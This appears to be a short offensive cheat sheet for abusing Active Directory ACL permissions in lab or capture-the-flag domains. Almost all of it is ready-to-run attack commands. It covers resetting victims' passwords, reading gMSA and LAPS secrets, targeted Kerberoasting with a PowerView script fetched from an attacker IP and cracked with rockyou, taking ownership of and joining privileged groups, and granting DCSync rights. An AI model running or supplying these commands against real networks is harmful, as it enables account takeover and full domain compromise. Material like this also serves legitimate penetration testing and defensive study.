AD ACL
GenericAll-User
If you have GenericAll access on a user object, you can reset that user's password.
net user robert FNUEOFNSIDsilfelifsef_1 /domain
From Linux:
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123
ReadGMSAPassword
You can retrieve the NT hash of gMSA accounts.
nxc ldap DOMAIN.HTB -u 'USER' -p 'PASS' --gmsa
WriteSPN
sudo wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 /var/www/html/PowerView.ps1
wget http://10.10.14.81/PowerView.ps1 -O PowerView.ps1
. .\PowerView.ps1
Set-DomainObject -Identity VICTIM -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainSPNTicket nonexistent/BLAHBLAH | fl
Set-DomainObject -Identity VICTIM -Clear serviceprincipalname
cat <<'EOF'>/tmp/hash
$krb5tgs$23$*UNKNOWN$UNKNOWN$nonexistent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
EOF
hashcat -m 13100 -a 0 /tmp/hash /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz --potfile-path=/home/user/HASHCATPOT
WriteOwner-Group
Change the owner of the group:
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'TheSuperAdminGroup' 'USER'
Owner-Group
As the owner, grant USER the GenericAll right over TheSuperAdminGroup:
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'TheSuperAdminGroup' 'USER'
GenericAll-Group
Add USER to the group:
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'TheSuperAdminGroup' 'USER'
ReadLAPSPassword
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps
WriteDacl
You can add any access right you want to the DACL, such as the rights needed for DCSync.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' setDCSync USER